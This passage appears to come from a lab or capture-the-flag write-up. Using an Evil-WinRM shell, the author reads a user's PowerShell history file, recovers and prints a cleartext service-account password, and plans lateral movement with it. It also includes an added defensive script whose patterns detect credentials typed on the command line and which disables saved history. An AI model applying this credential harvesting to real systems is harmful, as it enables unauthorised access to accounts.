PowerShell History
After performing some basic system enumeration, I came across the PowerShell history file for the current user.
*Evil-WinRM* PS C:\Users\legacyy\Documents> dir ~/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine
directory: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/3/2022 11:46 PM 434 ConsoleHost_history.txt
It is located at the usual path: %HOMEDIR%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
CLEARTEXT Credential
*Evil-WinRM* PS C:\Users\legacyy\Documents> cat ~/AppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine/ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
The PowerShell history mainly consists of building a PSCredential object and using it to invoke a remote command over WinRM (port 5986, SSL). In the process the user typed the password on the command line, so the history file holds the CLEARTEXT credential for the svc_deploy account: E3R$Q62^12p7PLlC%KWaxuaV
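From a defender's side, the lesson of this file is that anything typed into an interactive PowerShell session, passwords included, is persisted by PSReadLine under every user profile. The script below is an added example, not part of the original write-up: it sweeps the PSReadLine history of every profile under C:\Users for lines that embed credentials (the patterns, the profile root and the redaction rule are my own assumptions), reports where they were found with the quoted secret masked, and then shows how to stop PSReadLine from writing history to disk for the current user.

```powershell
# Added example (not from the original write-up): audit PSReadLine history files
# for commands that carry credentials, then disable on-disk history.
# The pattern list, profile root and redaction are assumptions for this example.

# Command shapes that usually mean a secret was typed on the command line.
$riskyPatterns = @(
    'ConvertTo-SecureString\s+.*-AsPlainText',   # plaintext -> SecureString, as in the history above
    'PSCredential\s*\(',                         # credential object built inline
    'net\s+user\s+\S+\s+\S+',                    # net user <name> <password>
    '-Password\s+\S+',                           # any cmdlet given -Password <value>
    'Invoke-Command.*-Credential'                # remote execution with explicit creds
)
$regex = ($riskyPatterns -join '|')   # Select-String is case-insensitive by default

function Find-HistoryCredentials {
    param(
        # Root that holds the user profiles; C:\Users on a default install.
        [string]$ProfileRoot = (Join-Path $env:SystemDrive 'Users')
    )
    # PSReadLine stores <host>_history.txt under each user's roaming AppData.
    $relative = 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine'

    Get-ChildItem -Path $ProfileRoot -Directory -ErrorAction SilentlyContinue | ForEach-Object {
        $user = $_.Name
        $dir  = Join-Path $_.FullName $relative
        if (-not (Test-Path $dir)) { return }

        Get-ChildItem -Path $dir -Filter '*_history.txt' -ErrorAction SilentlyContinue | ForEach-Object {
            $file = $_.FullName
            # One match object per offending line, with its line number.
            Select-String -Path $file -Pattern $regex | ForEach-Object {
                # Mask quoted strings so the secret itself never lands in the report.
                $masked = $_.Line -replace "'[^']*'", "'<redacted>'" -replace '"[^"]*"', '"<redacted>"'
                [pscustomobject]@{
                    User    = $user
                    File    = $file
                    Line    = $_.LineNumber
                    Command = $masked
                }
            }
        }
    }
}

# Run the sweep. Reading other users' profiles needs local admin rights;
# as an unprivileged user it will only report the current profile.
Find-HistoryCredentials | Format-Table -AutoSize

# Remediation for the current user: never write history to disk.
# Add this line to $PROFILE so every new session inherits it.
Set-PSReadLineOption -HistorySaveStyle SaveNothing
```

`-HistorySaveStyle SaveNothing` keeps in-session history working but stops the file from being written at all; where turning history off entirely is too disruptive, `Set-PSReadLineOption -AddToHistoryHandler` accepts a script block that can refuse to record individual lines matching the same patterns before they reach the file.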
I will attempt to validate the credential for Lateral Movement.